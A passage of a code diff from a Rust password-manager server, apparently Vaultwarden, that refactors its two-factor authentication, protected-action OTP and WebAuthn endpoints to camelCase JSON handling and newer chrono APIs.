err!("User not found!");
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[cfg(test)]
|
#[cfg(test)]
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
use chrono::{Duration, Utc};
|
use chrono::{TimeDelta, Utc};
|
||||||
use data_encoding::BASE32;
|
use data_encoding::BASE32;
|
||||||
use rocket::serde::json::Json;
|
use rocket::serde::json::Json;
|
||||||
use rocket::Route;
|
use rocket::Route;
|
||||||
@@ -7,7 +7,7 @@ use serde_json::Value;
|
|||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::{log_event, log_user_event},
|
core::{log_event, log_user_event},
|
||||||
EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
|
EmptyResult, JsonResult, PasswordOrOtpData,
|
||||||
},
|
},
|
||||||
auth::{ClientHeaders, Headers},
|
auth::{ClientHeaders, Headers},
|
||||||
crypto,
|
crypto,
|
||||||
@@ -19,6 +19,7 @@ use crate::{
|
|||||||
|
|
||||||
pub mod authenticator;
|
pub mod authenticator;
|
||||||
pub mod duo;
|
pub mod duo;
|
||||||
|
pub mod duo_oidc;
|
||||||
pub mod email;
|
pub mod email;
|
||||||
pub mod protected_actions;
|
pub mod protected_actions;
|
||||||
pub mod webauthn;
|
pub mod webauthn;
|
||||||
@@ -50,52 +51,51 @@ async fn get_twofactor(headers: Headers, mut conn: DbConn) -> Json<Value> {
|
|||||||
let twofactors_json: Vec<Value> = twofactors.iter().map(TwoFactor::to_json_provider).collect();
|
let twofactors_json: Vec<Value> = twofactors.iter().map(TwoFactor::to_json_provider).collect();
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
"Data": twofactors_json,
|
"data": twofactors_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null,
|
"continuationToken": null,
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/get-recover", data = "<data>")]
|
#[post("/two-factor/get-recover", data = "<data>")]
|
||||||
async fn get_recover(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_recover(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, true, &mut conn).await?;
|
data.validate(&user, true, &mut conn).await?;
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Code": user.totp_recover,
|
"code": user.totp_recover,
|
||||||
"Object": "twoFactorRecover"
|
"object": "twoFactorRecover"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct RecoverTwoFactor {
|
struct RecoverTwoFactor {
|
||||||
MasterPasswordHash: String,
|
master_password_hash: String,
|
||||||
Email: String,
|
email: String,
|
||||||
RecoveryCode: String,
|
recovery_code: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/recover", data = "<data>")]
|
#[post("/two-factor/recover", data = "<data>")]
|
||||||
async fn recover(data: JsonUpcase<RecoverTwoFactor>, client_headers: ClientHeaders, mut conn: DbConn) -> JsonResult {
|
async fn recover(data: Json<RecoverTwoFactor>, client_headers: ClientHeaders, mut conn: DbConn) -> JsonResult {
|
||||||
let data: RecoverTwoFactor = data.into_inner().data;
|
let data: RecoverTwoFactor = data.into_inner();
|
||||||
|
|
||||||
use crate::db::models::User;
|
use crate::db::models::User;
|
||||||
|
|
||||||
// Get the user
|
// Get the user
|
||||||
let mut user = match User::find_by_mail(&data.Email, &mut conn).await {
|
let Some(mut user) = User::find_by_mail(&data.email, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Username or password is incorrect. Try again.")
|
||||||
None => err!("Username or password is incorrect. Try again."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// Check password
|
// Check password
|
||||||
if !user.check_valid_password(&data.MasterPasswordHash) {
|
if !user.check_valid_password(&data.master_password_hash) {
|
||||||
err!("Username or password is incorrect. Try again.")
|
err!("Username or password is incorrect. Try again.")
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if recovery code is correct
|
// Check if recovery code is correct
|
||||||
if !user.check_valid_recovery_code(&data.RecoveryCode) {
|
if !user.check_valid_recovery_code(&data.recovery_code) {
|
||||||
err!("Recovery code is incorrect. Try again.")
|
err!("Recovery code is incorrect. Try again.")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -127,27 +127,27 @@ async fn _generate_recover_code(user: &mut User, conn: &mut DbConn) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct DisableTwoFactorData {
|
struct DisableTwoFactorData {
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
Type: NumberOrString,
|
r#type: NumberOrString,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/disable", data = "<data>")]
|
#[post("/two-factor/disable", data = "<data>")]
|
||||||
async fn disable_twofactor(data: JsonUpcase<DisableTwoFactorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn disable_twofactor(data: Json<DisableTwoFactorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: DisableTwoFactorData = data.into_inner().data;
|
let data: DisableTwoFactorData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
// Delete directly after a valid token has been provided
|
// Delete directly after a valid token has been provided
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash,
|
master_password_hash: data.master_password_hash,
|
||||||
Otp: data.Otp,
|
otp: data.otp,
|
||||||
}
|
}
|
||||||
.validate(&user, true, &mut conn)
|
.validate(&user, true, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
|
|
||||||
let type_ = data.Type.into_i32()?;
|
let type_ = data.r#type.into_i32()?;
|
||||||
|
|
||||||
if let Some(twofactor) = TwoFactor::find_by_user_and_type(&user.uuid, type_, &mut conn).await {
|
if let Some(twofactor) = TwoFactor::find_by_user_and_type(&user.uuid, type_, &mut conn).await {
|
||||||
twofactor.delete(&mut conn).await?;
|
twofactor.delete(&mut conn).await?;
|
||||||
@@ -160,30 +160,29 @@ async fn disable_twofactor(data: JsonUpcase<DisableTwoFactorData>, headers: Head
|
|||||||
}
|
}
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": false,
|
"enabled": false,
|
||||||
"Type": type_,
|
"type": type_,
|
||||||
"Object": "twoFactorProvider"
|
"object": "twoFactorProvider"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/two-factor/disable", data = "<data>")]
|
#[put("/two-factor/disable", data = "<data>")]
|
||||||
async fn disable_twofactor_put(data: JsonUpcase<DisableTwoFactorData>, headers: Headers, conn: DbConn) -> JsonResult {
|
async fn disable_twofactor_put(data: Json<DisableTwoFactorData>, headers: Headers, conn: DbConn) -> JsonResult {
|
||||||
disable_twofactor(data, headers, conn).await
|
disable_twofactor(data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn enforce_2fa_policy(
|
pub async fn enforce_2fa_policy(
|
||||||
user: &User,
|
user: &User,
|
||||||
act_uuid: &str,
|
act_user_id: &UserId,
|
||||||
device_type: i32,
|
device_type: i32,
|
||||||
ip: &std::net::IpAddr,
|
ip: &std::net::IpAddr,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
for member in UserOrganization::find_by_user_and_policy(&user.uuid, OrgPolicyType::TwoFactorAuthentication, conn)
|
for member in
|
||||||
.await
|
Membership::find_by_user_and_policy(&user.uuid, OrgPolicyType::TwoFactorAuthentication, conn).await.into_iter()
|
||||||
.into_iter()
|
|
||||||
{
|
{
|
||||||
// Policy only applies to non-Owner/non-Admin members who have accepted joining the org
|
// Policy only applies to non-Owner/non-Admin members who have accepted joining the org
|
||||||
if member.atype < UserOrgType::Admin {
|
if member.atype < MembershipType::Admin {
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
let org = Organization::find_by_uuid(&member.org_uuid, conn).await.unwrap();
|
let org = Organization::find_by_uuid(&member.org_uuid, conn).await.unwrap();
|
||||||
mail::send_2fa_removed_from_org(&user.email, &org.name).await?;
|
mail::send_2fa_removed_from_org(&user.email, &org.name).await?;
|
||||||
@@ -196,7 +195,7 @@ pub async fn enforce_2fa_policy(
|
|||||||
EventType::OrganizationUserRevoked as i32,
|
EventType::OrganizationUserRevoked as i32,
|
||||||
&member.uuid,
|
&member.uuid,
|
||||||
&member.org_uuid,
|
&member.org_uuid,
|
||||||
act_uuid,
|
act_user_id,
|
||||||
device_type,
|
device_type,
|
||||||
ip,
|
ip,
|
||||||
conn,
|
conn,
|
||||||
@@ -209,16 +208,16 @@ pub async fn enforce_2fa_policy(
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub async fn enforce_2fa_policy_for_org(
|
pub async fn enforce_2fa_policy_for_org(
|
||||||
org_uuid: &str,
|
org_id: &OrganizationId,
|
||||||
act_uuid: &str,
|
act_user_id: &UserId,
|
||||||
device_type: i32,
|
device_type: i32,
|
||||||
ip: &std::net::IpAddr,
|
ip: &std::net::IpAddr,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
let org = Organization::find_by_uuid(org_uuid, conn).await.unwrap();
|
let org = Organization::find_by_uuid(org_id, conn).await.unwrap();
|
||||||
for member in UserOrganization::find_confirmed_by_org(org_uuid, conn).await.into_iter() {
|
for member in Membership::find_confirmed_by_org(org_id, conn).await.into_iter() {
|
||||||
// Don't enforce the policy for Admins and Owners.
|
// Don't enforce the policy for Admins and Owners.
|
||||||
if member.atype < UserOrgType::Admin && TwoFactor::find_by_user(&member.user_uuid, conn).await.is_empty() {
|
if member.atype < MembershipType::Admin && TwoFactor::find_by_user(&member.user_uuid, conn).await.is_empty() {
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
let user = User::find_by_uuid(&member.user_uuid, conn).await.unwrap();
|
let user = User::find_by_uuid(&member.user_uuid, conn).await.unwrap();
|
||||||
mail::send_2fa_removed_from_org(&user.email, &org.name).await?;
|
mail::send_2fa_removed_from_org(&user.email, &org.name).await?;
|
||||||
@@ -230,8 +229,8 @@ pub async fn enforce_2fa_policy_for_org(
|
|||||||
log_event(
|
log_event(
|
||||||
EventType::OrganizationUserRevoked as i32,
|
EventType::OrganizationUserRevoked as i32,
|
||||||
&member.uuid,
|
&member.uuid,
|
||||||
org_uuid,
|
org_id,
|
||||||
act_uuid,
|
act_user_id,
|
||||||
device_type,
|
device_type,
|
||||||
ip,
|
ip,
|
||||||
conn,
|
conn,
|
||||||
@@ -259,7 +258,7 @@ pub async fn send_incomplete_2fa_notifications(pool: DbPool) {
|
|||||||
};
|
};
|
||||||
|
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
let time_limit = Duration::minutes(CONFIG.incomplete_2fa_time_limit());
|
let time_limit = TimeDelta::try_minutes(CONFIG.incomplete_2fa_time_limit()).unwrap();
|
||||||
let time_before = now - time_limit;
|
let time_before = now - time_limit;
|
||||||
let incomplete_logins = TwoFactorIncomplete::find_logins_before(&time_before, &mut conn).await;
|
let incomplete_logins = TwoFactorIncomplete::find_logins_before(&time_before, &mut conn).await;
|
||||||
for login in incomplete_logins {
|
for login in incomplete_logins {
|
||||||
@@ -268,10 +267,24 @@ pub async fn send_incomplete_2fa_notifications(pool: DbPool) {
|
|||||||
"User {} did not complete a 2FA login within the configured time limit. IP: {}",
|
"User {} did not complete a 2FA login within the configured time limit. IP: {}",
|
||||||
user.email, login.ip_address
|
user.email, login.ip_address
|
||||||
);
|
);
|
||||||
mail::send_incomplete_2fa_login(&user.email, &login.ip_address, &login.login_time, &login.device_name)
|
match mail::send_incomplete_2fa_login(
|
||||||
.await
|
&user.email,
|
||||||
.expect("Error sending incomplete 2FA email");
|
&login.ip_address,
|
||||||
login.delete(&mut conn).await.expect("Error deleting incomplete 2FA record");
|
&login.login_time,
|
||||||
|
&login.device_name,
|
||||||
|
&DeviceType::from_i32(login.device_type).to_string(),
|
||||||
|
)
|
||||||
|
.await
|
||||||
|
{
|
||||||
|
Ok(_) => {
|
||||||
|
if let Err(e) = login.delete(&mut conn).await {
|
||||||
|
error!("Error deleting incomplete 2FA record: {e:#?}");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Err(e) => {
|
||||||
|
error!("Error sending incomplete 2FA email: {e:#?}");
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -1,12 +1,12 @@
|
|||||||
use chrono::{Duration, NaiveDateTime, Utc};
|
use chrono::{DateTime, TimeDelta, Utc};
|
||||||
use rocket::Route;
|
use rocket::{serde::json::Json, Route};
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{EmptyResult, JsonUpcase},
|
api::EmptyResult,
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
crypto,
|
crypto,
|
||||||
db::{
|
db::{
|
||||||
models::{TwoFactor, TwoFactorType},
|
models::{TwoFactor, TwoFactorType, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
error::{Error, MapResult},
|
error::{Error, MapResult},
|
||||||
@@ -18,7 +18,7 @@ pub fn routes() -> Vec<Route> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
/// Data stored in the TwoFactor table in the db
|
/// Data stored in the TwoFactor table in the db
|
||||||
#[derive(Serialize, Deserialize, Debug)]
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
pub struct ProtectedActionData {
|
pub struct ProtectedActionData {
|
||||||
/// Token issued to validate the protected action
|
/// Token issued to validate the protected action
|
||||||
pub token: String,
|
pub token: String,
|
||||||
@@ -32,7 +32,7 @@ impl ProtectedActionData {
|
|||||||
pub fn new(token: String) -> Self {
|
pub fn new(token: String) -> Self {
|
||||||
Self {
|
Self {
|
||||||
token,
|
token,
|
||||||
token_sent: Utc::now().naive_utc().timestamp(),
|
token_sent: Utc::now().timestamp(),
|
||||||
attempts: 0,
|
attempts: 0,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -42,7 +42,7 @@ impl ProtectedActionData {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn from_json(string: &str) -> Result<Self, Error> {
|
pub fn from_json(string: &str) -> Result<Self, Error> {
|
||||||
let res: Result<Self, crate::serde_json::Error> = serde_json::from_str(string);
|
let res: Result<Self, serde_json::Error> = serde_json::from_str(string);
|
||||||
match res {
|
match res {
|
||||||
Ok(x) => Ok(x),
|
Ok(x) => Ok(x),
|
||||||
Err(_) => err!("Could not decode ProtectedActionData from string"),
|
Err(_) => err!("Could not decode ProtectedActionData from string"),
|
||||||
@@ -82,32 +82,33 @@ async fn request_otp(headers: Headers, mut conn: DbConn) -> EmptyResult {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Serialize, Debug)]
|
#[derive(Deserialize, Serialize, Debug)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct ProtectedActionVerify {
|
struct ProtectedActionVerify {
|
||||||
OTP: String,
|
#[serde(rename = "OTP", alias = "otp")]
|
||||||
|
otp: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/accounts/verify-otp", data = "<data>")]
|
#[post("/accounts/verify-otp", data = "<data>")]
|
||||||
async fn verify_otp(data: JsonUpcase<ProtectedActionVerify>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
async fn verify_otp(data: Json<ProtectedActionVerify>, headers: Headers, mut conn: DbConn) -> EmptyResult {
|
||||||
if !CONFIG.mail_enabled() {
|
if !CONFIG.mail_enabled() {
|
||||||
err!("Email is disabled for this server. Either enable email or login using your master password instead of login via device.");
|
err!("Email is disabled for this server. Either enable email or login using your master password instead of login via device.");
|
||||||
}
|
}
|
||||||
|
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
let data: ProtectedActionVerify = data.into_inner().data;
|
let data: ProtectedActionVerify = data.into_inner();
|
||||||
|
|
||||||
// Delete the token after one validation attempt
|
// Delete the token after one validation attempt
|
||||||
// This endpoint only gets called for the vault export, and doesn't need a second attempt
|
// This endpoint only gets called for the vault export, and doesn't need a second attempt
|
||||||
validate_protected_action_otp(&data.OTP, &user.uuid, true, &mut conn).await
|
validate_protected_action_otp(&data.otp, &user.uuid, true, &mut conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn validate_protected_action_otp(
|
pub async fn validate_protected_action_otp(
|
||||||
otp: &str,
|
otp: &str,
|
||||||
user_uuid: &str,
|
user_id: &UserId,
|
||||||
delete_if_valid: bool,
|
delete_if_valid: bool,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
let pa = TwoFactor::find_by_user_and_type(user_uuid, TwoFactorType::ProtectedActions as i32, conn)
|
let pa = TwoFactor::find_by_user_and_type(user_id, TwoFactorType::ProtectedActions as i32, conn)
|
||||||
.await
|
.await
|
||||||
.map_res("Protected action token not found, try sending the code again or restart the process")?;
|
.map_res("Protected action token not found, try sending the code again or restart the process")?;
|
||||||
let mut pa_data = ProtectedActionData::from_json(&pa.data)?;
|
let mut pa_data = ProtectedActionData::from_json(&pa.data)?;
|
||||||
@@ -122,9 +123,9 @@ pub async fn validate_protected_action_otp(
|
|||||||
|
|
||||||
// Check if the token has expired (Using the email 2fa expiration time)
|
// Check if the token has expired (Using the email 2fa expiration time)
|
||||||
let date =
|
let date =
|
||||||
NaiveDateTime::from_timestamp_opt(pa_data.token_sent, 0).expect("Protected Action token timestamp invalid.");
|
DateTime::from_timestamp(pa_data.token_sent, 0).expect("Protected Action token timestamp invalid.").naive_utc();
|
||||||
let max_time = CONFIG.email_expiration_time() as i64;
|
let max_time = CONFIG.email_expiration_time() as i64;
|
||||||
if date + Duration::seconds(max_time) < Utc::now().naive_utc() {
|
if date + TimeDelta::try_seconds(max_time).unwrap() < Utc::now().naive_utc() {
|
||||||
pa.delete(conn).await?;
|
pa.delete(conn).await?;
|
||||||
err!("Token has expired")
|
err!("Token has expired")
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -7,11 +7,11 @@ use webauthn_rs::{base64_data::Base64UrlSafeData, proto::*, AuthenticationState,
|
|||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::{log_user_event, two_factor::_generate_recover_code},
|
core::{log_user_event, two_factor::_generate_recover_code},
|
||||||
EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
|
EmptyResult, JsonResult, PasswordOrOtpData,
|
||||||
},
|
},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
db::{
|
db::{
|
||||||
models::{EventType, TwoFactor, TwoFactorType},
|
models::{EventType, TwoFactor, TwoFactorType, UserId},
|
||||||
DbConn,
|
DbConn,
|
||||||
},
|
},
|
||||||
error::Error,
|
error::Error,
|
||||||
@@ -96,20 +96,20 @@ pub struct WebauthnRegistration {
|
|||||||
impl WebauthnRegistration {
|
impl WebauthnRegistration {
|
||||||
fn to_json(&self) -> Value {
|
fn to_json(&self) -> Value {
|
||||||
json!({
|
json!({
|
||||||
"Id": self.id,
|
"id": self.id,
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"migrated": self.migrated,
|
"migrated": self.migrated,
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/get-webauthn", data = "<data>")]
|
#[post("/two-factor/get-webauthn", data = "<data>")]
|
||||||
async fn get_webauthn(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_webauthn(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
if !CONFIG.domain_set() {
|
if !CONFIG.domain_set() {
|
||||||
err!("`DOMAIN` environment variable is not set. Webauthn disabled")
|
err!("`DOMAIN` environment variable is not set. Webauthn disabled")
|
||||||
}
|
}
|
||||||
|
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, false, &mut conn).await?;
|
data.validate(&user, false, &mut conn).await?;
|
||||||
@@ -118,19 +118,15 @@ async fn get_webauthn(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut
|
|||||||
let registrations_json: Vec<Value> = registrations.iter().map(WebauthnRegistration::to_json).collect();
|
let registrations_json: Vec<Value> = registrations.iter().map(WebauthnRegistration::to_json).collect();
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": enabled,
|
"enabled": enabled,
|
||||||
"Keys": registrations_json,
|
"keys": registrations_json,
|
||||||
"Object": "twoFactorWebAuthn"
|
"object": "twoFactorWebAuthn"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/get-webauthn-challenge", data = "<data>")]
|
#[post("/two-factor/get-webauthn-challenge", data = "<data>")]
|
||||||
async fn generate_webauthn_challenge(
|
async fn generate_webauthn_challenge(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
data: JsonUpcase<PasswordOrOtpData>,
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
headers: Headers,
|
|
||||||
mut conn: DbConn,
|
|
||||||
) -> JsonResult {
|
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, false, &mut conn).await?;
|
data.validate(&user, false, &mut conn).await?;
|
||||||
@@ -152,7 +148,7 @@ async fn generate_webauthn_challenge(
|
|||||||
)?;
|
)?;
|
||||||
|
|
||||||
let type_ = TwoFactorType::WebauthnRegisterChallenge;
|
let type_ = TwoFactorType::WebauthnRegisterChallenge;
|
||||||
TwoFactor::new(user.uuid, type_, serde_json::to_string(&state)?).save(&mut conn).await?;
|
TwoFactor::new(user.uuid.clone(), type_, serde_json::to_string(&state)?).save(&mut conn).await?;
|
||||||
|
|
||||||
let mut challenge_value = serde_json::to_value(challenge.public_key)?;
|
let mut challenge_value = serde_json::to_value(challenge.public_key)?;
|
||||||
challenge_value["status"] = "ok".into();
|
challenge_value["status"] = "ok".into();
|
||||||
@@ -161,102 +157,94 @@ async fn generate_webauthn_challenge(
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Debug, Deserialize)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EnableWebauthnData {
|
struct EnableWebauthnData {
|
||||||
Id: NumberOrString, // 1..5
|
id: NumberOrString, // 1..5
|
||||||
Name: String,
|
name: String,
|
||||||
DeviceResponse: RegisterPublicKeyCredentialCopy,
|
device_response: RegisterPublicKeyCredentialCopy,
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
// This is copied from RegisterPublicKeyCredential to change the Response objects casing
|
|
||||||
#[derive(Debug, Deserialize)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct RegisterPublicKeyCredentialCopy {
|
struct RegisterPublicKeyCredentialCopy {
|
||||||
pub Id: String,
|
pub id: String,
|
||||||
pub RawId: Base64UrlSafeData,
|
pub raw_id: Base64UrlSafeData,
|
||||||
pub Response: AuthenticatorAttestationResponseRawCopy,
|
pub response: AuthenticatorAttestationResponseRawCopy,
|
||||||
pub Type: String,
|
pub r#type: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
// This is copied from AuthenticatorAttestationResponseRaw to change clientDataJSON to clientDataJson
|
// This is copied from AuthenticatorAttestationResponseRaw to change clientDataJSON to clientDataJson
|
||||||
#[derive(Debug, Deserialize)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct AuthenticatorAttestationResponseRawCopy {
|
pub struct AuthenticatorAttestationResponseRawCopy {
|
||||||
pub AttestationObject: Base64UrlSafeData,
|
#[serde(rename = "AttestationObject", alias = "attestationObject")]
|
||||||
pub ClientDataJson: Base64UrlSafeData,
|
pub attestation_object: Base64UrlSafeData,
|
||||||
|
#[serde(rename = "clientDataJson", alias = "clientDataJSON")]
|
||||||
|
pub client_data_json: Base64UrlSafeData,
|
||||||
}
|
}
|
||||||
|
|
||||||
impl From<RegisterPublicKeyCredentialCopy> for RegisterPublicKeyCredential {
|
impl From<RegisterPublicKeyCredentialCopy> for RegisterPublicKeyCredential {
|
||||||
fn from(r: RegisterPublicKeyCredentialCopy) -> Self {
|
fn from(r: RegisterPublicKeyCredentialCopy) -> Self {
|
||||||
Self {
|
Self {
|
||||||
id: r.Id,
|
id: r.id,
|
||||||
raw_id: r.RawId,
|
raw_id: r.raw_id,
|
||||||
response: AuthenticatorAttestationResponseRaw {
|
response: AuthenticatorAttestationResponseRaw {
|
||||||
attestation_object: r.Response.AttestationObject,
|
attestation_object: r.response.attestation_object,
|
||||||
client_data_json: r.Response.ClientDataJson,
|
client_data_json: r.response.client_data_json,
|
||||||
},
|
},
|
||||||
type_: r.Type,
|
type_: r.r#type,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// This is copied from PublicKeyCredential to change the Response objects casing
|
|
||||||
#[derive(Debug, Deserialize)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct PublicKeyCredentialCopy {
|
pub struct PublicKeyCredentialCopy {
|
||||||
pub Id: String,
|
pub id: String,
|
||||||
pub RawId: Base64UrlSafeData,
|
pub raw_id: Base64UrlSafeData,
|
||||||
pub Response: AuthenticatorAssertionResponseRawCopy,
|
pub response: AuthenticatorAssertionResponseRawCopy,
|
||||||
pub Extensions: Option<AuthenticationExtensionsClientOutputsCopy>,
|
pub extensions: Option<AuthenticationExtensionsClientOutputs>,
|
||||||
pub Type: String,
|
pub r#type: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
// This is copied from AuthenticatorAssertionResponseRaw to change clientDataJSON to clientDataJson
|
// This is copied from AuthenticatorAssertionResponseRaw to change clientDataJSON to clientDataJson
|
||||||
#[derive(Debug, Deserialize)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct AuthenticatorAssertionResponseRawCopy {
|
pub struct AuthenticatorAssertionResponseRawCopy {
|
||||||
pub AuthenticatorData: Base64UrlSafeData,
|
pub authenticator_data: Base64UrlSafeData,
|
||||||
pub ClientDataJson: Base64UrlSafeData,
|
#[serde(rename = "clientDataJson", alias = "clientDataJSON")]
|
||||||
pub Signature: Base64UrlSafeData,
|
pub client_data_json: Base64UrlSafeData,
|
||||||
pub UserHandle: Option<Base64UrlSafeData>,
|
pub signature: Base64UrlSafeData,
|
||||||
}
|
pub user_handle: Option<Base64UrlSafeData>,
|
||||||
|
|
||||||
#[derive(Debug, Deserialize)]
|
|
||||||
#[allow(non_snake_case)]
|
|
||||||
pub struct AuthenticationExtensionsClientOutputsCopy {
|
|
||||||
#[serde(default)]
|
|
||||||
pub Appid: bool,
|
|
||||||
}
|
}
|
||||||
|
|
||||||
impl From<PublicKeyCredentialCopy> for PublicKeyCredential {
|
impl From<PublicKeyCredentialCopy> for PublicKeyCredential {
|
||||||
fn from(r: PublicKeyCredentialCopy) -> Self {
|
fn from(r: PublicKeyCredentialCopy) -> Self {
|
||||||
Self {
|
Self {
|
||||||
id: r.Id,
|
id: r.id,
|
||||||
raw_id: r.RawId,
|
raw_id: r.raw_id,
|
||||||
response: AuthenticatorAssertionResponseRaw {
|
response: AuthenticatorAssertionResponseRaw {
|
||||||
authenticator_data: r.Response.AuthenticatorData,
|
authenticator_data: r.response.authenticator_data,
|
||||||
client_data_json: r.Response.ClientDataJson,
|
client_data_json: r.response.client_data_json,
|
||||||
signature: r.Response.Signature,
|
signature: r.response.signature,
|
||||||
user_handle: r.Response.UserHandle,
|
user_handle: r.response.user_handle,
|
||||||
},
|
},
|
||||||
extensions: r.Extensions.map(|e| AuthenticationExtensionsClientOutputs {
|
extensions: r.extensions,
|
||||||
appid: e.Appid,
|
type_: r.r#type,
|
||||||
}),
|
|
||||||
type_: r.Type,
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/webauthn", data = "<data>")]
|
#[post("/two-factor/webauthn", data = "<data>")]
|
||||||
async fn activate_webauthn(data: JsonUpcase<EnableWebauthnData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
